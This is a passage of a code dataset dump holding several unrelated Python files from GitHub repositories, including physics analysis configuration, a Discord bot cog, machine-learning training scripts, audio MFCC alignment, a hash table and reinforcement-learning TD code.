not k.startswith('_')}\n return base\n\n def get_config_dict(self):\n \"\"\"\n Produces the configuration info needed for _stacksusy\n \"\"\"\n config_dict = {\n 'selection': self.selection,\n 'jet_tag_requirements': self.btag_config,\n 'leading_jet_pt': self.kinematics['leading_jet_gev']*1e3,\n 'met': self.kinematics['met_gev']*1e3,\n 'type': self.type.upper(),\n 'hists': self.hists.upper(),\n 'tagger': _get_tagger(self.btag_config, self.tagger),\n 'jet_tag_assignment': self.jet_tag_assignment,\n 'boson_pt_correction': self.boson_pt_correction,\n }\n return config_dict\n\nclass SuperRegionKey(object):\n \"\"\"\n Constructed from a Region, compares identical if the regions fall in the\n same SuperRegion.\n\n Not clear that this is any cleaner than a simple tuple... maybe\n better to stick a superregion hash function in the region...\n \"\"\"\n def __init__(self, region):\n self.req_bits = region.get_bits()\n self.veto_bits = region.get_antibits()\n self.region_bits = region.get_region_bits()\n self.jet_tags = tuple(region.btag_config)\n self.region_type = region.type\n\n\nclass SuperRegion(object):\n \"\"\"\n Constructed from a list of regions. SuperRegions combine kinematics from\n normal regions.\n \"\"\"\n kinematics = ['leading_jet_gev', 'met_gev']\n def __init__(self, met_lower_bound=0, leading_jet_lower_bound=120):\n self.subregions = {}\n self.tuple = None\n self.kinematic_lower_bounds = {\n 'leading_jet_gev': leading_jet_lower_bound,\n 'met_gev': met_lower_bound}\n def add_subregion(self, name, region):\n reg_tuple = superregion_tuple(region)\n if self.tuple:\n if reg_tuple != self.tuple:\n raise ValueError(\n \"tried to add an incompatible subregion\"\n \" (adding {} to {})\".format(reg_tuple, self.tuple))\n else:\n self.tuple = reg_tuple\n for kin in self.kinematics:\n if region.kinematics[kin] < self.kinematic_lower_bounds[kin]:\n self.kinematic_lower_bounds[kin] = region.kinematics[kin]\n self.subregions[name] = region\n\n def get_common_name(self):\n subnames = self.subregions.keys()\n if not subnames:\n raise ValueError(\"no subregions in this superregion\")\n min_len = min(len(x) for x in subnames)\n if not min_len:\n return ''\n for cn in xrange(min_len):\n if any(name[cn] != subnames[0][cn] for name in subnames):\n return subnames[0][:cn]\n return subnames[0][:min_len]\n\n def get_yaml_dict(self):\n subregions = {\n n:v.get_yaml_dict() for n,v in self.subregions.iteritems()}\n output = {\n 'subregions':subregions,\n 'lower_bounds': self.kinematic_lower_bounds.copy(),\n }\n return output\n\n def get_config_dict(self):\n (req, veto, jtags, reg_type, reg_bits, jet_tag_ass,\n boson_pt_correction ) = self.tuple\n lower_bounds = self.kinematic_lower_bounds\n config_dict = {\n 'jet_tag_requirements': list(jtags),\n 'leading_jet_pt': lower_bounds['leading_jet_gev']*1e3,\n 'met': lower_bounds['met_gev']*1e3,\n 'required_bits': req,\n 'veto_bits': veto,\n 'region_bits': reg_bits,\n 'type': reg_type.upper(),\n 'hists': 'KINEMATIC_STAT',\n # ACHTUNG: dont care about tagger for untagged superregions\n 'tagger': _get_tagger(jtags,None),\n 'jet_tag_assignment': jet_tag_ass,\n 'boson_pt_correction': boson_pt_correction\n }\n return config_dict\n\n\ndef condense_regions(regions):\n \"\"\"\n get superregions from normal regions\n \"\"\"\n super_regions = {}\n for name, region in regions.iteritems():\n supertuple = superregion_tuple(region)\n if not supertuple in super_regions:\n super_regions[supertuple] = SuperRegion()\n super_regions[supertuple].add_subregion(name, region)\n used_names = {}\n named_regions = {}\n for region in super_regions.values():\n name = region.get_common_name()\n if name in used_names:\n used_names[name] += 1\n else:\n used_names[name] = 0\n final_name = name + str(used_names[name])\n named_regions[final_name] = region\n return named_regions\n\ndef superregion_tuple(region):\n req_bits = region.get_bits()\n veto_bits = region.get_antibits()\n region_bits = region.get_region_bits()\n jet_tags = tuple(region.btag_config)\n return (req_bits, veto_bits, jet_tags, region.type, region_bits,\n region.jet_tag_assignment, region.boson_pt_correction)\n\n\nclass RegionConfigError(ValueError):\n def __init__(self, message):\n super(RegionConfigError,self).__init__(message)\n\ndef _get_tagger(jet_tags, tagger):\n \"\"\"\n Figure out the tagger based on the tags used.\n \"\"\"\n jfc_tags = {j for j in jet_tags if j.startswith('JFC')}\n non_jfc = set(jet_tags) - jfc_tags - set(['NOTAG'])\n if tagger:\n if jfc_tags or non_jfc:\n raise RegionConfigError(\n \"should only specify tagger when op are given\")\n return tagger\n\n if jfc_tags and non_jfc:\n raise RegionConfigError(\n \"can't be mixing taggers (right now), tried to use {}\".format(\n ', '.join(set(jet_tags))))\n if jfc_tags:\n return 'JFC'\n else:\n return 'CNN'\n","repo_name":"dguest/susy-analysis","sub_path":"python/scharm/stack/regions.py","file_name":"regions.py","file_ext":"py","file_size_in_byte":7333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35708406276","text":"import os\nfrom difflib import get_close_matches\n\nimport discord\nfrom discord import Webhook, RequestsWebhookAdapter\nfrom discord.ext import commands\n\nimport core.embeds as embeds\n\n\nclass ClipboardHelpCommand(commands.HelpCommand):\n async def send_bot_help(self, mapping):\n bot = self.context.bot\n\n cogs = [bot.get_cog(\"Clipboard\"), bot.get_cog(\"Settings\"), bot.get_cog(\"Misc\")]\n cog_commands = [cog.get_commands() for cog in cogs]\n\n help_embed = discord.Embed()\n help_embed.set_author(name=bot.user, icon_url=bot.user.avatar_url)\n help_embed.colour = 2228207\n help_embed.set_footer(text=f\"Use {self.clean_prefix}help [command] to get help for a specific command.\")\n\n for cog_command in cog_commands:\n value = '\\n'.join(\n [f\"**{self.clean_prefix}{command.qualified_name}** - *{command.short_doc.strip()}*\" for command in\n cog_command])\n value = value.replace(\" - **\", \"\")\n help_embed.add_field(\n name=cog_command[0].cog_name,\n value=value\n )\n await self.get_destination().send(embed=help_embed)\n\n async def send_command_help(self, command):\n bot = self.context.bot\n\n help_embed = discord.Embed()\n help_embed.set_author(name=bot.user, icon_url=bot.user.avatar_url)\n help_embed.colour = 2228207\n help_embed.set_footer(text=f\"Use {self.clean_prefix}help [command] to get help for a specific command.\")\n\n help_embed.title = f\"{self.clean_prefix}{command.qualified_name} {command.signature}\"\n description = command.help.split(\"~\")\n help_embed.add_field(name=\"Description\", value=description[0].replace(\"{prefix}\", self.clean_prefix))\n help_embed.add_field(name=\"Usage\",\n value=\"```\" + description[1].strip(\"\\n \").replace(\"{prefix}\", self.clean_prefix) + \"```\")\n try:\n help_embed.add_field(name=\"Note\", value=description[2].replace(\"{prefix}\", self.clean_prefix),\n inline=False)\n except IndexError:\n pass\n if command.aliases:\n aliases = \"`\" + \"`, `\".join(command.aliases) + \"`\"\n else:\n aliases = \"No aliases.\"\n help_embed.add_field(name=\"Aliases\", value=aliases, inline=False)\n help_embed.set_footer(\n text=f\"Use {self.clean_prefix}help to see all the commands.\" +\n \"\\n\" + \"\\u2501\" * 40 + \"\\n\" +\n \"[]'s are optional arguments. <>'s are required arguments.\")\n await self.get_destination().send(embed=help_embed)\n\n async def send_error_message(self, error):\n command = self.context.kwargs.get(\"command\")\n command_names = set()\n for cmd in self.context.bot.walk_commands():\n if not cmd.hidden:\n command_names.add(cmd.qualified_name)\n closest = get_close_matches(command, command_names, 2)\n if not closest:\n closest = get_close_matches(command, command_names, 1, 0)\n closest = \"` or `\".join(closest)\n await self.get_destination().send(embed=embeds.error(\n f\"Command `{command}` not found. Did you mean `{closest}`?\"\n ))\n\n\nclass Misc(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n self.bot.help_command = ClipboardHelpCommand(\n verify_checks=False,\n command_attrs={\n \"help\":\n \"\"\"\n Shows this help message.\n ~\n {prefix}help\n {prefix}help invite\n \"\"\"\n },\n )\n self.bot.help_command.cog = self\n\n @commands.command(aliases=[\"givemebot\"])\n async def invite(self, ctx):\n \"\"\"\n Get the invite link of the bot.\n ~\n {prefix}invite\n \"\"\"\n invite = f\"https://discordapp.com/api/oauth2/authorize?client_id={self.bot.user.id}&permissions=67584&scope=bot\"\n await ctx.send(embed=discord.Embed(\n color=discord.colour.Colour.teal(),\n description=f\":mailbox_with_mail: [Invite]({invite}) me to your server!\"))\n\n @commands.command()\n @commands.cooldown(1, os.environ.get(\"FEEDBACK_COOLDOWN\", 120), commands.BucketType.user)\n async def feedback(self, ctx, *, feedback):\n \"\"\"\n Send feedback about the bot.\n ~\n {prefix}feedback this bot is very good.\n {prefix}feedback I have a command idea...\n \"\"\"\n url = os.environ.get(\"FEEDBACK_WEBHOOK\", None)\n if url:\n webhook = Webhook.from_url(url, adapter=RequestsWebhookAdapter())\n embed = discord.Embed(description=feedback, colour=discord.Colour.teal())\n embed.set_author(name=f\"{ctx.author.name}#{ctx.author.discriminator}\", icon_url=ctx.author.avatar_url)\n embed.set_footer(text=f\"User id: {ctx.author.id}\")\n webhook.send(embed=embed)\n await ctx.send(embed=embeds.success(\"Sent the feedback!\"))\n else:\n await ctx.send(embed=embeds.error(\"This command is disabled.\"))\n\n @commands.command()\n async def ping(self, ctx):\n \"\"\"\n Gives the pong!\n ~\n {prefix}ping\n \"\"\"\n m = await ctx.send(\"One moment...\")\n t1 = ctx.message.created_at\n t2 = m.created_at\n rc = (t2 - t1).total_seconds()\n emoji = '☠️' if rc > 50 else ('😭' if rc > 5 else ('😨' if rc > 1 else '👌'))\n await m.edit(content=\"Pong! `{0:.3f}s` {1}\\n\".format(rc, emoji))\n\n\ndef setup(bot):\n bot.add_cog(Misc(bot))\n","repo_name":"RealCyGuy/Clipboard","sub_path":"cogs/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":5640,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"32571166985","text":"'''\n# -*- encoding: utf-8 -*-\n# 文件 : train.py\n# 说明 : 对模型进行训练\n# 时间 : 2022/06/27 16:58:41\n# 作者 : Hito\n# 版本 : 1.0\n# 环境 : pytorch1.7\n'''\n\n\nfrom net.densebox import DenseBox\nfrom net.loss import BCELoss\nfrom utils.utils import mask_by_sel\nfrom utils.dataloader import LPPatch_Offline\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport os\nimport numpy as np\nfrom utils.utils import get_lr\nimport shutil\n\n\n\ndef train(num_epoch=30,lambda_loc=3.0,base_lr=1e-4, resume=None, save_folder='./weights'):\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n train_set = LPPatch_Offline(root='./dataset', transform=None, size=(240, 240))\n batch_size = 10\n train_loader = torch.utils.data.DataLoader(dataset=train_set, batch_size=batch_size, shuffle=True, num_workers=4)\n # network\n net = DenseBox().to(device)\n # ---------------- whether to resume from checkpoint\n if resume is not None:\n if os.path.isfile(resume):\n net.load_state_dict(torch.load(resume))\n print('=> net resume from {}'.format(resume))\n else:\n print('=> [Note]: invalid resume path @ %s, resume failed.' % resume)\n \n \n # ---------------- loss functions\n # element-wise L2 loss\n loss_func = nn.MSELoss(reduce=False).to(device)\n # loss_func = nn.BCELoss(reduce=False).to(device)\n\n # optimization function\n # optimizer = torch.optim.SGD(net.parameters(), lr=base_lr, momentum=9e-1, weight_decay=5e-4) # 5e-4\n \n lr = 1e-3\n optimizer = optim.Adam(net.parameters(),lr,weight_decay=5e-4)\n lr_scheduler = optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=5, eta_min=1e-5)\n # lr_scheduler = optim.lr_scheduler.StepLR(optimizer,step_size=1,gamma=0.95)\n \n if os.path.exists(save_folder):\n shutil.rmtree(save_folder)\n os.makedirs(save_folder)\n \n \n print('\\nTraining...')\n net.train()\n\n for epoch_i in range(num_epoch):\n for batch_i, (data, label_map, loss_mask) in enumerate(train_loader):\n # ------------- put data to device\n data, label_map = data.to(device), label_map.to(device) # n,3,240,240 # n,5,60,60\n\n # ------------- clear gradients\n optimizer.zero_grad()\n\n # ------------- forward pass\n score_out, loc_out = net.forward(data)\n\n # ------------- loss calculation with hard negative mining\n score_map_gt = label_map[:, 0] # n,60,60\n score_map_gt = score_map_gt.unsqueeze(1) # n,1,60,60\n loc_map_gt = label_map[:, 1:] # n,4,60,60\n\n positive_indices = torch.nonzero(score_map_gt) # m ,4 m表示非0元素的个数,其实4就是每个元素的位置坐标\n positive_num = positive_indices.size(0)\n\n # to keep the ratio of positive and negative sample to 1\n negative_num = int(float(positive_num) / float(data.size(0)) + 0.5)\n score_out = torch.sigmoid(score_out)\n score_loss = loss_func(score_out, score_map_gt)\n # score_loss = BCELoss(score_out, score_map_gt) # n,1,60,60\n\n # loc loss should be masked by label scores and to be summed\n loc_loss = loss_func(loc_out, loc_map_gt) # n,4,60,60\n\n # negative smapling... debug\n ones_mask = torch.ones([data.size(0), 1, 60, 60],\n dtype=torch.float32).to(device)\n neg_mask = ones_mask - score_map_gt\n negative_score_loss = score_loss * neg_mask\n\n half_neg_num = int(negative_num * 0.5 + 0.5)\n negative_score_loss = negative_score_loss.view(data.size(0), -1)\n hard_negs, hard_neg_indices = torch.topk(input=negative_score_loss,\n k=half_neg_num,\n dim=1)\n\n rand_neg_indices = torch.zeros([data.size(0), half_neg_num],\n dtype=torch.long).to(device)\n for i in range(data.size(0)):\n indices = np.random.choice(3600, # 60 * 60\n half_neg_num,\n replace=False)\n indices = torch.Tensor(indices)\n rand_neg_indices[i] = indices\n\n # concatenate negative sample ids 所选定的负样本,包括损失最大的负样本和随机筛选的(各占负样本的一半),负样本总数为正样本的一半\n neg_indices = torch.cat((hard_neg_indices, rand_neg_indices), dim=1)\n\n neg_indices = neg_indices.cpu()\n positive_indices = positive_indices.cpu()\n\n # fill the loss mask\n mask_by_sel(loss_mask=loss_mask,\n pos_indices=positive_indices,\n neg_indices=neg_indices)\n\n # ------------- calculate final loss\n loss_mask = loss_mask.to(device)\n\n mask_score_loss = loss_mask * score_loss\n mask_loc_loss = loss_mask * score_map_gt * loc_loss\n\n loss = torch.sum(mask_score_loss) + torch.sum(lambda_loc * mask_loc_loss)\n\n # ------------- back propagation\n loss.backward()\n optimizer.step()\n\n # ------------- print loss\n iter_count = epoch_i * len(train_loader) + batch_i\n if iter_count % 10 == 0:\n print('=> epoch {} iter {:>3d}/{:>3d}'\n ', total_iter {:>5d} '\n ', lr {:>.8f} '\n ', mask_loss {:>5.3f} '\n ', local_loss {:>5.3f} '\n '| loss {:>5.3f}'\n .format(epoch_i + 1,\n batch_i,\n len(train_loader),\n iter_count,\n get_lr(optimizer),\n torch.sum(mask_score_loss).item(),\n torch.sum(lambda_loc * mask_loc_loss).item(),\n loss.item()))\n\n # ------------ save checkpoint\n torch.save(net.state_dict(), save_folder+'/model_' + str(epoch_i) + '.pth')\n print('<= {} saved.\\n'.format(save_folder+'/model_' + str(epoch_i) + '.pth'))\n \n lr_scheduler.step()\n\n torch.save(net.state_dict(), save_folder+'/model_final.pth')\n print('<= {} saved.\\n'.format(save_folder+'/model_final.pth'))\n \n\n\nif __name__ == \"__main__\":\n resume = 'model_2.pth'\n train(num_epoch=100, lambda_loc=3.0, resume=resume)\n","repo_name":"hito0512/DenseBox","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6670,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5585310255","text":"from pydub import AudioSegment\nimport numpy as np\nimport python_speech_features as psf\nfrom fastdtw import fastdtw\nfrom scipy.spatial.distance import euclidean\nimport matplotlib.pyplot as plt\n\ndef get_aligned_mfccs(file_pair, output_length):\n \"\"\"\n Takes a pair of file paths, returns aligned MFCC coefficients for the two\n audio clips\n \"\"\"\n mfccs = []\n \n for file in file_pair: \n \n sound = AudioSegment.from_file(file) \n samples = np.array(list(sound.get_array_of_samples()))\n \n mfcc_samples = psf.mfcc(samples,\n samplerate=16000,\n winlen=0.025,\n winstep=0.01,\n numcep=13,\n nfilt=26,\n nfft=512,\n lowfreq=0,\n highfreq=None,\n preemph=0.97,\n ceplifter=22,\n appendEnergy=True)\n \n mfccs.append(mfcc_samples)\n \n sample = mfccs[0]\n target = mfccs[1]\n \n distance, path = fastdtw(sample, target, dist=euclidean)\n \n sample_aligned = [sample[i] for (i, j) in path]\n target_aligned = [target[j] for (i, j) in path]\n \n aligned_length = len(sample_aligned)\n \n head_padding = [np.zeros(13) for i in range((output_length - aligned_length) // 2)]\n tail_padding = [np.zeros(13) for i in range((output_length - aligned_length) // 2)]\n \n padded_sample = head_padding + sample_aligned + tail_padding\n padded_target = head_padding + target_aligned + tail_padding\n \n return (np.array(padded_sample), np.array(padded_target))\n\ndef reconstruct_from_mfcc(coeffs):\n pass\n\n\nprint(get_aligned_mfccs((\"Data/kaggle_cuts/bosnian3/Wednesday.mp3\",\"Data/kaggle_cuts/english368/Wednesday.mp3\"), 250)[0][125])","repo_name":"sspusapaty/accenttransfer","sub_path":"genMCCData.py","file_name":"genMCCData.py","file_ext":"py","file_size_in_byte":1799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15447350489","text":"from collections import Counter\n\nfrom mesa.space import Grid\n\nfrom agents.CellAgent import CellAgent\n\n\nclass GridParser:\n\n def __init__(self, grid_filename, model=None, torus=True, alive_char=None, dead_char=None):\n self.parsed_grid = self.__parse_text(grid_filename)\n self.torus = torus\n self.model = model\n self.alive_char = alive_char\n self.dead_char = dead_char\n\n def get_shape(self):\n width, height = self.__get_shape(self.parsed_grid)\n return width, height\n\n def get_grid(self):\n width, height = self.get_shape()\n grid = Grid(width, height, self.torus)\n alive_char, dead_char = self.__get_alive_dead_char(self.parsed_grid, self.alive_char, self.dead_char)\n grid = self.__populate_grid(self.parsed_grid, grid, self.model, alive_char, dead_char)\n return grid\n\n @staticmethod\n def __parse_text(grid_filename):\n with open(grid_filename, 'r') as f:\n return f.read().split('\\n')\n\n @staticmethod\n def __get_shape(parsed_grid):\n height = len(parsed_grid)\n width = len(parsed_grid[0])\n\n for line in parsed_grid:\n if len(line) != width:\n raise ValueError('Not equal length of rows.')\n return width, height\n\n @staticmethod\n def __get_alive_dead_char(parsed_grid, alive_char, dead_char):\n if alive_char is not None and dead_char is not None:\n return alive_char, dead_char\n return GridParser.__find_alive_dead(parsed_grid)\n\n @staticmethod\n def __find_alive_dead(parsed_grid):\n counter = Counter(''.join(parsed_grid))\n if len(counter) > 2:\n raise ValueError(f'More than two values in grid file.')\n dead_char = counter.most_common(2)[0][0] # First record, char\n alive_char = counter.most_common(2)[1][0] # Second record, char\n return alive_char, dead_char\n\n @staticmethod\n def __populate_grid(parsed_grid, grid, model, alive_char, dead_char):\n for x, row in enumerate(reversed(parsed_grid)):\n for y, el in enumerate(row):\n if el == alive_char:\n agent = CellAgent((x, y), model, CellAgent.STATE_ALIVE)\n elif el == dead_char:\n agent = CellAgent((x, y), model, CellAgent.STATE_DEAD)\n else:\n raise ValueError('Parsing error.')\n grid.place_agent(agent, (y, x))\n return grid\n","repo_name":"pfilo8/Agent-based-modeling","sub_path":"Assignment-3/utils/GridParser.py","file_name":"GridParser.py","file_ext":"py","file_size_in_byte":2470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6263693284","text":"import pandas as pd\r\nfrom efficient_apriori import apriori\r\ntran = [] #交易\r\n\r\nd = pd.read_csv('Market_Basket_Optimisation.csv', header = None)#读取文件中的数据\r\nfor a in range(0, d.shape[0]):\r\n temp = []\r\n for b in range(0, 20):\r\n if str(d.values[a, b]) != 'nan':\r\n temp.append(str(d.values[a, b]))\r\n tran.append(temp)\r\n\r\n#频繁项集和频繁规则\r\nprint(tran, '\\n')\r\npinfanxiangji, guanlianguize = apriori(tran, min_support = 0.02, min_confidence = 0.4)\r\nprint('频繁项集:', pinfanxiangji, '\\n')\r\nprint('关联规则:', guanlianguize)","repo_name":"qiushi-loves-life/DataEngine","sub_path":"第四课作业/第四课作业apriori.py","file_name":"第四课作业apriori.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37517608923","text":"#! /usr/bin/env python3\n\n########################################################\n# The example shows on top of example 5 how to extract #\n# the white-light image #\n########################################################\n\nimport numpy as np\nfrom renishawWiRE import WDFReader\nfrom _path import curdir, imgdir\n\ntry:\n import matplotlib.pyplot as plt\n import matplotlib.image as mpimg\n\n plot = True\nexcept ImportError:\n plot = False\n\n\ndef peak_in_range(spectra, wn, range, method=\"max\", **params):\n \"\"\"Find the max intensity of peak within range\n method can be max, min, or mean\n \"\"\"\n cond = np.where((wn >= range[0]) & (wn <= range[1]))[0]\n spectra_cut = spectra[:, :, cond]\n return getattr(np, method)(spectra_cut, axis=2, **params)\n\n\ndef main():\n filename = curdir / \"spectra_files\" / \"mapping.wdf\"\n reader = WDFReader(filename)\n assert reader.measurement_type == 3\n wn = reader.xdata\n spectra = reader.spectra\n\n print(wn.shape, spectra.shape)\n # Test newer API\n map_x = reader.xpos\n map_y = reader.ypos\n map_w = reader.map_info[\"x_span\"]\n map_h = reader.map_info[\"y_span\"]\n\n # w and h are the measure in xy coordinates\n # Level the spectra\n spectra = spectra - np.min(spectra, axis=2, keepdims=True)\n peaks_a = peak_in_range(spectra, wn, [1295, 1340])\n peaks_b = peak_in_range(spectra, wn, [1350, 1400])\n\n ratio = peaks_a / peaks_b\n\n if plot is True:\n # Must provide the format to read the optical image\n img = mpimg.imread(reader.img, format=\"jpg\")\n img_x0, img_y0 = reader.img_origins\n img_w, img_h = reader.img_dimensions\n print(reader.img_dimensions)\n plt.figure(figsize=(10, 5))\n\n # Left, plot the white light image and rectangle area\n plt.subplot(121)\n # Show the image with upper origin extent See\n # https://matplotlib.org/3.1.1/gallery/text_labels_and_annotations/text_alignment.html\n plt.imshow(img, extent=(img_x0, img_x0 + img_w, img_y0 + img_h, img_y0))\n # Add rectangle for marking\n r = plt.Rectangle(\n xy=(map_x.min(), map_y.min()), width=map_w, height=map_h, fill=False\n )\n plt.gca().add_patch(r)\n plt.xlabel(\"Stage X [μm]\")\n plt.ylabel(\"Stage Y [μm]\")\n\n # Right plot histogram of Peak A/B mapping\n plt.subplot(122)\n plt.imshow(\n ratio,\n interpolation=\"bicubic\",\n extent=[0, map_w, map_h, 0],\n vmin=0.5,\n vmax=1.5,\n )\n plt.xlabel(\"Mapping x [μm]\")\n plt.ylabel(\"Mapping y [μm]\")\n cb = plt.colorbar()\n cb.ax.set_title(\"Ratio\")\n plt.tight_layout()\n plt.show(block=False)\n plt.pause(3)\n plt.savefig(imgdir / \"map-optical.png\", dpi=100)\n plt.close()\n else:\n pass\n return\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"alchem0x2A/py-wdf-reader","sub_path":"examples/ex6_mapping_img.py","file_name":"ex6_mapping_img.py","file_ext":"py","file_size_in_byte":2932,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"53"} +{"seq_id":"26130481087","text":"class HashTable:\n def __init__(self, size):\n self.size = size\n self.table = [[] for _ in range(size)]\n\n def hash(self, key):\n return sum([ord(c) for c in key]) % self.size\n #Takes the sum of ascii values then mods by size of table\n # That gives us the index of the value to lookup\n\n\n\n\n\n#So here is the insert method that will insert a key value pair into the table\n#If they key already exists the value will be replaced.\n#Because we are looping through the list its O(n) for the worst case.\n#The bucket is the list at the index of the hash key\n#This makes it so we can have multiple values at the same index\n #Big O is O(n)\n def insert(self, key, value):\n hash_key = self.hash(key)\n bucket = self.table[hash_key]\n for i, (k, v) in enumerate(bucket):\n if k == key:\n bucket[i] = (key, value)\n return\n bucket.append((key, value))\n\n#This is the lookup method that will return the value of the key\n#If the key does not have any values in the bucket it will raise a key error\n #Big O is O(n)\n def lookup(self, key):\n hash_key = self.hash(key)\n bucket = self.table[hash_key]\n for k, v in bucket:\n if k == key:\n return v\n raise KeyError(key)\n\n def contains(self, address):\n for i in range(len(self.table)):\n if self.table[i] == address:\n return True\n\n\n\n\n","repo_name":"DavidBoudrot/DjikstraWithMultithreading","sub_path":"hashtable.py","file_name":"hashtable.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18593235549","text":"from typing import List, Tuple\n\nfrom ..structs import Result\nfrom ..turbo import turbo\nfrom ..types.generators import TurboGenFn\nfrom .subqueries import subqueries_bot\n\n__all__ = [\n \"self_ask_bot\",\n]\n\n\n# Utils\ndef make_qa_context(qa_context, previous_qa):\n \"\"\"Prepare qa context.\"\"\"\n\n # Add previous q&a as faq\n if len(previous_qa):\n qas = \"\\n\\n\".join([f\"Q: {q}\\nA: {a}\" for q, a in previous_qa])\n\n qa_context += \"FAQ:\\n\"\n qa_context += qas\n\n return qa_context\n\n\n@turbo(temperature=0.7)\nasync def self_ask_bot(\n question: str,\n context: str,\n qa_bot: TurboGenFn,\n subquery_instructions: str = \"User is asking questions to an AI assistant.\",\n):\n \"\"\"Takes a question and qa_bot and uses them to answer step by step.\"\"\"\n\n # Generate sub queries\n queries = await subqueries_bot(\n request=question,\n context=subquery_instructions,\n ).run()\n\n # Answer sub-questions\n previous_qa: List[Tuple[str, str]] = []\n\n for query in [*queries.content, question]:\n # Generate new answer\n answer = await qa_bot(\n question=query,\n context=make_qa_context(context, previous_qa),\n ).run()\n\n # Append query and answer to list\n previous_qa.append((query, answer.content))\n\n # Yield the last answer as the result\n yield Result(content=previous_qa[-1][-1])\n","repo_name":"julep-ai/turbo-ai","sub_path":"turbo_chat/bots/self_ask.py","file_name":"self_ask.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"42637160372","text":"import sys\nimport gym\nimport numpy as np\nfrom tqdm import tqdm\nimport argparse\nif \"../\" not in sys.path: sys.path.append(\"../\")\nfrom lib.common_utils import TabularUtils\nfrom ch04_DP.DP import Tabular_DP\nfrom TD_learning import Tabular_TD\nfrom lib.regEnvs import *\n\n\nclass Tabular_nStepTD:\n def __init__(self, args):\n self.env = args.env\n self.num_episodes=10000\n self.gamma = 0.99\n self.alpha = 0.05\n self.env_nA = self.env.action_space.n\n self.env_nS = self.env.observation_space.n\n self.tabularUtils = TabularUtils(self.env)\n \n def nStepTD_prediction(self, policy, n):\n V_est = np.zeros(self.env_nS)\n for epi in range(self.num_episodes):\n done = False\n t = 0\n s = self.env.reset()\n T = float(\"inf\")\n S = []\n S.append(s) # append intial state\n R = []\n R.append(0.0)\n while True:\n if t < T:\n a = np.argmax(policy[s])\n s_next, r, done, _ = self.env.step(a)\n S.append(s_next)\n R.append(r)\n if done:\n T = t+1\n # the time step whose state’s estimate is being updated\n τ = t - n + 1\n if τ >= 0:\n # compute return G\n G = 0\n for i in range(τ+1, min(τ+n, T)+1):\n G += (self.gamma**(i-τ-1)) * R[i]\n if τ + n < T:\n G = G + (self.gamma**n) * V_est[S[τ+n]]\n V_est[S[τ]] = V_est[S[τ]] + self.alpha * (G - V_est[S[τ]])\n\n # move to next time step\n s = s_next\n t += 1\n\n if τ == T-1:\n break\n\n return V_est\n\n\n def nStep_sarsa(self, n):\n Q = np.zeros((self.env_nS, self.env_nA))\n for epi in range(self.num_episodes):\n S = []; R = []; A = []\n R.append(0.0)\n s = self.env.reset()\n S.append(s) # append intial state\n a = self.tabularUtils.epsilon_greedy_policy(Q[s, :]) \n A.append(a)\n T = float(\"inf\")\n t = 0\n while True:\n # print(\"time step is %d\" %t)\n if t < T:\n s_next, r, done, _ = self.env.step(a)\n S.append(s_next); R.append(r)\n if done:\n T = t+1\n else:\n a = self.tabularUtils.epsilon_greedy_policy(Q[s, :]) \n A.append(a)\n tau = t - n + 1\n if tau >= 0:\n # compute return G\n G = 0\n for i in range(tau+1, min(tau+n, T)+1):\n G += (self.gamma**(i-tau-1)) * R[i]\n if tau + n < T:\n G = G + (self.gamma**n) * Q[S[tau+n], A[tau+n]]\n Q[S[tau], A[tau]] = Q[S[tau], A[tau]] + self.alpha * (G - Q[S[tau], A[tau]])\n\n # move to next time step\n s = s_next\n t += 1\n\n if tau == T-1:\n break\n \n greedy_policy = self.tabularUtils.Q_value_to_greedy_policy(Q)\n\n return Q, greedy_policy\n \n\n def nStep_offPolicy_sarsa(self, n):\n \"\"\"\n policy pi is a greedy policy regarding Q \n policy b, the behaviour policy is a epsilon-greedy policy regarding Q\n \"\"\"\n Q = np.zeros((self.env_nS, self.env_nA))\n pi = np.zeros((self.env_nS, self.env_nA))\n b = np.zeros((self.env_nS, self.env_nA))\n for epi in range(self.num_episodes):\n S = []; R = []; A = []\n R.append(0.0)\n s = self.env.reset()\n S.append(s) # append intial state\n a = self.tabularUtils.epsilon_greedy_policy(Q[s, :]) \n A.append(a)\n T = float(\"inf\")\n t = 0\n while True:\n # print(\"time step is %d\" %t)\n if t < T:\n s_next, r, done, _ = self.env.step(a)\n S.append(s_next); R.append(r)\n if done:\n T = t+1\n else:\n a = np.argmax(b[s, :])\n A.append(a)\n tau = t - n + 1\n if tau >= 0:\n for i in range(tau+1, min(tau+n, T)+1):\n ro *= 1\n # compute return G\n G = 0\n for i in range(tau+1, min(tau+n, T)+1):\n G += (self.gamma**(i-tau-1)) * R[i]\n if tau + n < T:\n G = G + (self.gamma**n) * Q[S[tau+n], A[tau+n]]\n Q[S[tau], A[tau]] = Q[S[tau], A[tau]] + self.alpha * ro * (G - Q[S[tau], A[tau]])\n\n # update pi and b\n pi = self.tabularUtils.Q_value_to_greedy_policy(Q)\n b = self.tabularUtils.Q_value_to_epison_greedy_policy(Q)\n\n # move to next time step\n s = s_next\n t += 1\n\n if tau == T-1:\n break\n \n return Q, pi\n\n\n def nStep_tree_backup(self, n):\n Q = np.zeros((self.env_nS, self.env_nA))\n pi = np.zeros((self.env_nS, self.env_nA))\n for epi in range(self.num_episodes):\n S = []; R = []; A = []\n R.append(0.0)\n s = 